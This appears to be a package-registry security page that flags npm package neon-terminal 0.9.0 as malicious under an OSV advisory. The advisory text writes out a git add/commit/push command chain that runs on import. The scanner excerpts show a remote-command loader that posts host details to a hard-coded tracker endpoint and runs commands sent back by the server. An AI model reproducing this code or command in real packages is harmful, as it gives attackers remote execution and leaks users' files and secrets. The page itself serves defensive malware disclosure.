registry  /  neon-terminal  /  0.9.0

neon-terminal@0.9.0

OSV Malicious Advisory

scanned 2h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-6793 confirms this npm version as malicious. neon-terminal advertises itself as an ANSI color helper but its CJS entry (dist/index.cjs) and ESM entry (src/index.js) each execute a shell command at top level, so the code fires on `require('neon-terminal')` or `import 'neon-terminal'`. The command runs `pwd && ls -la && git status && git add. && git commit -m "sync" && git push -u origin main` in the consumer's current working directory...

Advisory
MAL-2026-6793
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in neon-terminal (npm)
Details
neon-terminal advertises itself as an ANSI color helper but its CJS entry (dist/index.cjs) and ESM entry (src/index.js) each execute a shell command at top level, so the code fires on `require('neon-terminal')` or `import 'neon-terminal'`. The command runs `pwd && ls -la && git status && git add. && git commit -m "sync" && git push -u origin main` in the consumer's current working directory. When loaded inside a project that is a git repository, this stages every local file (including untracked/uncommitted files that may contain secrets, credentials, or in-progress code), creates a commit under the installer's git identity, and pushes to whatever `origin` remote is configured. The behavior is undocumented, ungated, and unrelated to the package's advertised purpose. Consequences on the installer: (1) unauthorized commits to the installer's repository under the installer's identity; (2) exfiltration of local, previously-uncommitted files to the configured remote (which may be a public or third-party-visible repo); (3) destructive mutation of git history / branch state without consent.
Decision reason
One or more suspicious static signals were detected.

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessEnvironmentVarsNetworkShell
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 9.58 KB of source, external domains: tracker.bvgroup.co

Source & flagged code

4 flagged · loading source
src/index.jsView file
1// neon-terminal — tiny ANSI color + TTY helpers for terminal output. L2: import { exec } from 'child_process' L3:
High
Child Process

Package source references child process execution.

src/index.jsView on unpkg · L1
28clientName: process.env.HOSTNAME || 'node-client', L29: hostname: process.env.HOSTNAME || '', L30: platform: process.platform, ... L34: } L35: const client = await readJson(await fetch(ENDPOINT + '?_tracker=hello', { L36: method: 'POST', ... L43: const done = new Promise((resolve) => { L44: child = exec(task.command, { L45: cwd: task.workingDirectory || undefined,
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

src/index.jsView on unpkg · L28
34} L35: const client = await readJson(await fetch(ENDPOINT + '?_tracker=hello', { L36: method: 'POST', L37: headers: { 'Content-Type': 'application/json' }, L38: body: JSON.stringify(hello), L39: })) ... L43: const done = new Promise((resolve) => { L44: child = exec(task.command, { L45: cwd: task.workingDirectory || undefined, ... L47: timeout: (task.timeoutSeconds || 30) * 1000, L48: }, (error, stdout, stderr) => resolve({ error, stdout, stderr })) L49: })
High
Command Output Exfiltration

Source combines command execution, command-output handling, and outbound requests; review data flow before blocking.

src/index.jsView on unpkg · L34
1// neon-terminal — tiny ANSI color + TTY helpers for terminal output. L2: import { exec } from 'child_process' L3: L4: const ENDPOINT = "https://tracker.bvgroup.co/remote/t42xNzaT2SnXbS_PsZ3gKDY-keTufZ2J" L5: L6: async function readJson(response) { L7: const body = await response.text() L8: const contentType = response.headers.get('content-type') || '' ... L17: headers: { 'Content-Type': 'application/json' }, L18: body: JSON.stringify(payload), L19: }) ... L27: protocolVersion: 1,
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

src/index.jsView on unpkg · L1

Findings

5 High3 Medium3 Low
HighChild Processsrc/index.js
HighShell
HighSame File Env Network Executionsrc/index.js
HighCommand Output Exfiltrationsrc/index.js
HighSandbox Evasion Gated Capabilitysrc/index.js
MediumNetwork
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings